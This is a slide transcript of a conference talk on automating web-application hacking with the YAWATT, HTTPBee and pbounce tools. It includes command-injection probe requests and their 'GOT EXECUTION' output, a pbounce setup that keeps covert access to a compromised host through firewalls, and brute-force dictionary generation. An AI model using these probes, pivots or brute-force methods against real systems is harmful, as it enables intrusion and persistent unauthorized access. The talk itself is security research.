Hacking techniques automation - PowerPoint PPT Presentation

About This Presentation
Title:

Hacking techniques automation

Description:

Hacking techniques automation Yarochkin Fyodor. Guard-Info Meder Kydyraliev O0o.nu sec. Singapore – PowerPoint PPT presentation

Number of Views:128
Avg rating:3.0/5.0
Slides: 51
Provided by: beez
Learn more at: https://www.hitcon.org
Category:

less

Transcript and Presenter's Notes

Title: Hacking techniques automation


1
Hacking techniques automation
  • Yarochkin Fyodor.
  • Guard-Info

Meder Kydyraliev O0o.nu sec. Singapore
2
I will talk about my research interests during
past year or so.. So, why automate hacking ?-
design hackers personal agent- leverage time
use- other uses of automation
3
Agenda
  • Agents the concept of Hackers personal
    Assistant and how I am going to get it working
  • YAWATT concepts, knowledge base, planning
  • Implementation - YAWATT, httpbee, pbounce
  • Notes on distributed approach
  • Notes on automation
  • Hacking web applications with httpbee and YAWATT
  • Maintaining control of compromised hosts with
    pbounce

4
Agents
  • Why agents
  • Why Hacker personal Assistant
  • How our framework is to be designed

5
Agent inner workings diagram(generic)
6
Inter Agent framework
  • We have roles
  • Facilator
  • Requesting agents
  • Service Agents
  • Meta agents (used for planning)

7
Inter Agent framework diagram
8
Service agents
  • Yawatt web analysis, data mining
  • HttpBee swiss knife for web application testing
  • Pbounce advanced tunneling

9
YAWATT focus is around web applications, why?
  • HTTP/HTTPS services are very common and usually
    legimate (services that the company is usually
    aiming to provide)
  • Web applications often are complex
  • Often programmed by non-professionals
  • System Administrators are not programmers and
    cant fix bad code.. Conclusion is..

10
the Web applications - the largest hole to get
through
  • The code is bad
  • Q/A not security oriented
  • Must get product to market ASAP
  • Firewalls are there but they cant help
  • IDS are there but they are blind (HTTPS)
  • Application firewalls - stop limited number of
    web application attacks (basic user input
    validation), but are useless when it comes to
    detection of logical vulnerabilities

11
Requirements to the framework
  • Automated methods and tools to test security
  • Ability to emulate hacker attacks (think like
    a hacker would do)
  • Ability to extract, store and transfer knowledge
    from expensive security professionals (aka
    hackers) to cheap computer automation
  • Ability to have real-time interaction with
    testing process

12
Software agents
  • Autonomous functionality
  • Cooperation capabilities
  • Learning and knowledge management capabilities
  • More to the feature wishlist
  • Let human do what he can do faster and
  • learn from human -gt knowledge transfer
  • Deal with uncertainty in intelligent way

13
YAWATT design blocks
  • YAWATT knowledge base - Efficient knowledge base
    for testing methods, knowledge about testing
    targets, infrastructure and so on implemented
    as
  • Efficient planning abilities (work in progress)

14
Knowledge representation in YAWATT
  • Ontology is represented with Time, Objects
    (hosts, networks, applications, urls, etc),
    Actions
  • Shall be added beliefs (intuitive guessings)

15
YAWATT knowledge base
  • Still in design process.
  • Httpbee (working horse of yawatt, also an
    agent) talks to KB via API
  • Knowledge can be accessed or added via set of
    requests
  • TELL(X, Y)
  • ASK(X)
  • QUERY(X)
  • (KB operates on entities which are objects
    within target network. An application, host,
    user, can be an entity, different entities may
    have different properties.
  • Implementation single table is used to store
    entities and their types. Separate tables are
    used to keep properties of different agents

16
Planning in YAWATT
  • Currently yawatt agent system is designed as
    centralized system httpbee instances talk to
    YAWATT server (which maintains KB)
  • P2P architecture is in TODO
  • Agent actions can be later planned, when KB is
    enriched with the data from human security
    analysts
  • Inference engine/planner is at design stage
  • (need to think how to represent analyst
    knowledge and actions to be taken in general form)

17
Details on tools of tradeYAWATT, httbee, pbounce
18
What we want to achieve
  • Learning capabilities
  • Control of software agents
  • Intelligent data management
  • Interesting Visualization (maybe?)
  • Data aggregation, analysis (for reporting etc)

19
YAWATT one of learning methods is learning from
user sessions
  • User sessions collections of users requests
    and responses (url, name/value pairs, session
    information and selective HTTP protocol data)
  • Classified user session data include semantic
    classification of URL, parameters, responses and
    HTTP protocol data (server type, backend
    system(s) if visible, unusual HTTP headers
    detected and included)

20
YAWATT Automation
  • Application content is learnt from user sessions
    (data feeders proxies, enumeration tools)
  • Real-time content analysis with additional
    verification

21
YAWATT ideas on raw data classification (of
entities)
  • User session data is classified by
  • Semantic and functional classification of URL
  • HTTP protocol classificators (server type,
    cookies ..)
  • Session classificators
  • Input data classification type, semantics
  • Output classification (application error
    detection, redirects, bogus responses etc)

22
YAWATT real-time classification
23
YAWATT Testing process
  • Testing with HTTPBee (introduced later)
  • Testing with YAWATT Plugins (tests) could be
    executed during the collection of user session
    data if any of user session data triggers certain
    plugin
  • Plugins (tests) are executed on demand, when user
    session data is completed

24
YAWATT Intelligence components
  • Web application components (URL) classification
  • Semantic classification for web application input
    data
  • Use of Latent Semantic Indexing Algorithm in
    response analysis
  • In response analyzers.
  • Use of queries to external sources, search
    engines
  • Generation of target-specific bruteforce
    dictionaries

25
YAWATTInput data classification
26
YAWATT Use of classified user session data
27
YAWATT Communication layer
  • Originally odified version of spread toolkit used
    as base (www.spread.org)
  • Replaced with Yawatt Data Excahnge Server,
    running over HTTP

28
YAWATT architecture
29
Arbitrary data collection (from YAWATT Database)
  • Aside from application vulnerabilities, other
    things of interest are
  • Email addresses, user ids that could be seen
    within web content
  • Domain names (within web pages, comments, binary
    files, etc)
  • Building target-oriented dictionary files (used
    by brute-force cracking modules)

30
How the targeted dictionaries for brute-force
attacks are generated
  • A statistical information extraction method is
    applied
  • Step 1Random similarly styled texts in the same
    language as the target application content, are
    analyzed and the statistical occurrence of each
    word is calculated
  • Step 2Statistical occurrence of each word within
    the target website is calculated
  • Step 3The dictionary is produced by selecting
    those words which probability produced in Step 1
    and Step 2 is significally different

31
YAWATT (hands on)
  • You will need linux, burp proxy, YAWATT tarball.
  • Start YAWATT Collector, start burp proxy with
    YAWATT plugin loaded. Start browsing
  • If you see stuff running you can try ..

32
You can try to add your own plugin
  • Add your plugin code on the fly (attack
    automation plugins via subscription mechanism,
    classification plugins etc)
  • Cant be simpler

33
YAWATT visualization (work in progress) (show
actual application)
34
Introducing HTTPBee
35
HTTPBee
  • High-performance threaded HTTP service testing
    tool. Designed as swiss-army-knife for HTTP
    services hacking
  • Scriptable via LUA scripting engine
  • API for sophisticated data analysis
  • Command line (or daemon mode, later)
  • Can be integrated with YAWATT (via scripts, or
    LUA API later)

36
HTTPBee scripting Engine
  • Simple
  • High-performance provided by HTTPBee code

37
HTTPBee API
38
HTTPBee API
39
HTTPBee output
  • HttpBee 0.1-pre. (http//o0o.nu)Started at
    2007-03-08 0120 CSTStarting up 3 scanning
    threads...GET /cmd.php?commandechoGOTTALOVETHEE
    XEC HTTP/1.0GET /cmd.php?fooechoGOTTALOVETHEEX
    EC HTTP/1.0GET /cmd.php?includeechoGOTTALOVETH
    EEXEC HTTP/1.0GET /cmd.php?file_incechoGOTTALO
    VETHEEXEC HTTP/1.0GET /cmd.php?harechoGOTTALOV
    ETHEEXEC HTTP/1.0GET /cmd.php?delechoGOTTALOVE
    THEEXEC HTTP/1.0GET /cmd.php?cmdechoGOTTALOVET
    HEEXEC HTTP/1.0GOT EXECUTION WITH REQUESTGET
    /cmd.php?commandechoGOTTALOVETHEEXEC
  • Script execution completedall is doneWating for
    scanning process to stop..........................
    ..................................................
    ..................................................
    ..................................................
    ..................................................
    ..............................done at 2007-03-08
    0120 CST.Total execution time 12 seconds.

40
Experimenting with HTTPBee
  • You can try to design your own scripting modules
  • Analyst knowledge can be represented in form of
    such scripts

41
Introducing pbounce
Co-work with Meder Kydyraliev
42
What is pbounce
  • Advanced port and connection forwarding tool.
  • Connection encapsulation and multiplexing on
    demand through a single connection
  • Pivot mode allows to pierce firewalls that
    allow outgoing connections only.
  • Small binary footprint. Extremely portable
    (windows, unixes, binaries packaged)
  • Remote command execution possibilities

43
Pbounce sample architecture
  • Two instances of pbounce are required.
  • LiMo instance should run on your machine
  • PiMo (pivoting mode) instance should run on
    compromised system
  • LiMo is the control center for PiMo pbounce
    instances.

44
PBounce sample architecture
  • Pbounce infrastructure setup

Internal system 192.168.0.10
LAN
Run pbounce in PiMo as Pbounce P R
XXX.XXX.XXX.XXX r 10000
firewall
internet
Your machine
Run pbounce in LiMo as Pbounce L 5000 r 10000
45
PBounce binding port
  • Connect to port 5000 on your machine and issue
    command
  • BIND 192.168.0.10 T 22 1022
  • Port 1022 on your machine will be associated
  • With port 22 on 192.168.0.10

46
PBounce other features
  • If LiMo node dies, PiMo instance will continuesly
    try to establish connection
  • PiMo instance may be scripted via external script
    to obtain LiMo address from external source (i.e.
    post to a newsgroup)
  • Primitive data scrambling with k key is
    supported (this is not encryption. But
    obfuscation!)
  • Pbounce supports HTTP proxy with CONNECT method
    availability (-F proxyIP, -f proxyport)

47
Code availability
  • PBounce
  • http//o0o.nu/meder/index.php?pgpbounce
  • HTTPBee
  • http//o0o.nu/httpbee
  • YAWATT
  • http//o0o.nu/YAWATT

48
Other research interests
  • SS7 security
  • Working on scanning tools
  • Ruby binding for SCTP

49
Questions and Answers
  • Sample questions, pick one ---------)
  • Why another hacking tool?
  • Can you do X too..?
  • Can X be integrated too ..?
  • This presentation is boring crap, any excuse ..? ?

50
Thanks
  • Thanks for your patience
  • Send me email if you like the stuff ?
Write a Comment
User Comments (0)
About PowerShow.com